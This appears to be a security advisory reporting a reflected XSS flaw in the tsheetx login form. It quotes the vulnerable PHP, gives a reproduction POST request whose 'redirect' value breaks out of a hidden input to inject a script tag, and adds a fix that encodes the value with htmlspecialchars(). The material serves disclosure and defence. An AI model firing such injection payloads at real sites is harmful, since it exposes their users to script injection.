There's a cross-site scripting vulnerability in the login form that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter.
Version: <=1.5.3
https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40
https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l54
    $redirect = isset($_REQUEST["redirect"]) ? $_REQUEST["redirect"] : "";
    ?>
    <html>
    <head>
    <title>Timesheet Login</title>
    <?php include ("header.inc"); ?>
    </head>
    <body onLoad="document.loginForm.username.focus();">
    <form action="login.php" method="POST" name="loginForm" style="margin: 0px;">
    <input type="hidden" name="redirect" value="<?php echo $redirect; ?>" />
To reproduce:
    POST /login.php HTTP/1.1
    Host: localhost
    Content-Length: 108
    Cache-Control: max-age=0
    Origin: http://localhost
    Upgrade-Insecure-Requests: 1
    DNT: 1
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://localhost/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fi;q=0.7
    Connection: close

    redirect="/><script>alert("XSS")</script><input style="display:none&username=some&password=some&Login=submit
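
One way to close the hole reported above is to encode the value for the HTML attribute context before it is echoed into the hidden field. This is an added example, not tsheetx code or the project's own fix; the helper names `redirect_param`, `attr` and `redirect_field` are hypothetical and the sample inputs are constructed.

```php
<?php
// Added example, not tsheetx code. Helper names are hypothetical.

// Normalise the raw request value. "redirect[]=x" arrives as an array, so
// anything that is not a string is treated as absent.
function redirect_param(array $request): string
{
    $value = $request['redirect'] ?? '';
    return is_string($value) ? $value : '';
}

// Encode for a quoted HTML attribute. ENT_QUOTES covers both quote characters;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Build the hidden field that login.php emits, with the value encoded.
function redirect_field(array $request): string
{
    return '<input type="hidden" name="redirect" value="'
        . attr(redirect_param($request)) . '" />';
}

// Constructed inputs: the value from the report, an array-typed parameter,
// a benign relative path (made up for this example), and a missing parameter.
$samples = [
    ['redirect' => '"/><script>alert("XSS")</script><input style="display:none'],
    ['redirect' => ['unexpected', 'array']],
    ['redirect' => 'example.php?month=3&year=2018'],
    [],
];

foreach ($samples as $request) {
    $html = redirect_field($request);
    // The field must stay a single element: exactly one "<" and one ">".
    $intact = substr_count($html, '<') === 1 && substr_count($html, '>') === 1;
    echo ($intact ? 'ok   ' : 'FAIL ') . $html . PHP_EOL;
}
```

In `login.php` the equivalent change is to pass `$redirect` through the same encoding at the point where it is echoed into the `value` attribute.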